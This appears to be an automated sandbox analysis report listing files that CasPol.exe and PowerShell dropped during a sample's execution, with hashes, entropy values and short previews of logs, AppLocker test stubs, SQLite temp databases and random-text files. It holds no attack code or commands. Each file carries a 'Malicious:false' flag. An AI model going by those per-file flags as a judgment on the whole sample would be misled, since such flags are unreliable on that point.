                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CasPol.exe.log

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2666
                                                                                          Entropy (8bit):5.345804351520589
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHsLHG1qHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JMO
                                                                                          MD5:D0D47194D5B74E55C630347DE6A96230
                                                                                          SHA1:12AF0C6B683051AA403511EC84D3AA54207E27F1
                                                                                          SHA-256:4F2D52BD8198E047A17A76CEA912DEAEF331E91BF45DE94935967827B692E997
                                                                                          SHA-512:6A5080E7AEEF7E62ACB7D798B60D2F9D498D8D904A238318A0A985B7C62A4E71E1BE326AA3DDDCB961223A392F06C3E1DB5A46D519DDF48DBF5EB11C4096DF45
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:NlllulVmdtZ:NllUM
                                                                                          MD5:013016A37665E1E37F0A3576A8EC8324
                                                                                          SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                                                          SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                                                          SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                                                          Malicious:false
                                                                                          Preview:@...e................................................@..........

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04ifsrck.pbp.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g355htam.phd.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5mpkhr5.5nq.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfah5zvq.3tw.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\tmp100E.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp101F.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.136413900497188
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp1EE2.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp1F31.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp46EF.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp46F0.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp4701.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp4712.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp4713.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp4742.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp5352.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\tmp6793.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.696178193607948
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                          MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                          SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                          SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                          SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                          Malicious:false
                                                                                          Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                          C:\Users\user\AppData\Local\Temp\tmp67A4.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.697358951122591
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                          MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                          SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                          SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                          SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                          Malicious:false
                                                                                          Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                          C:\Users\user\AppData\Local\Temp\tmp67A5.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1026
                                                                                          Entropy (8bit):4.6998645060098685
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                          MD5:1676F91570425F6566A5746BC8E8427E
                                                                                          SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                          SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                          SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                          Malicious:false
